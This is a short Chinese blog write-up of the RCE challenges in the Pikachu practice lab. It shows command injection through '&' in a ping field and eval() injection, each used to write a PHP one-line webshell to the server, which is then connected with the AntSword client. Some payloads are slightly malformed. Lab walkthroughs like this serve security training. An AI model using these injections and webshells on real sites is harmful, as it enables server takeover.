技术栈

Pikachu靶场之RCE漏洞详解

2407-2 shw2024-09-08 16:15

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POSTcmd);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST"cmd")?>');

3.蚁剑连接

上一篇:红黑树
下一篇:云计算之网络
相关推荐
广州灵眸科技有限公司
3 分钟前
“一机一码”安全加密方案
网络·单片机·嵌入式硬件·安全
NCU_wander
4 分钟前
LB HA(high avaliablity)和nginx
运维·nginx
徐子元竟然被占了!!
4 分钟前
Linux磁盘扩容
linux·运维·服务器
徐子元竟然被占了!!
5 分钟前
Linux的lsblk
linux·运维·服务器
世***y
10 分钟前
“综合”应急演练|安全不松懈,演练筑防线
安全
ai_coder_ai
11 分钟前
论网络安全体系设计
安全·web安全
专注API从业者
21 分钟前
告别手动翻页!基于淘宝商品接口 + Open Claw 实现自动化选品与实时监控(附完整 Python 代码)
大数据·运维·数据库·自动化
拦路雨g
22 分钟前
VMware centos磁盘容量扩容
linux·运维·centos
休息一下…
23 分钟前
能用的Docker镜像
运维·docker·容器
热门推荐
01《置身钉内》原文-可播放阅读02Claude Code、Codex、Cursor三分天下:2026年AI编程Agent生态全景剖析03【AI】2026 年具身智能模型和世界模型总结04AI科技热点日报 | 2026年6月1日052026 AI 编程工具终极实战指南:Cursor vs Claude Code vs Copilot,开发者该怎么选?06GitHub 镜像站点072026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf082026年6月AI行业全景:从百模大战到Agent元年,这30天发生了什么?09Codex 下载安装指南:Windows 和 macOS 官方版下载10【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法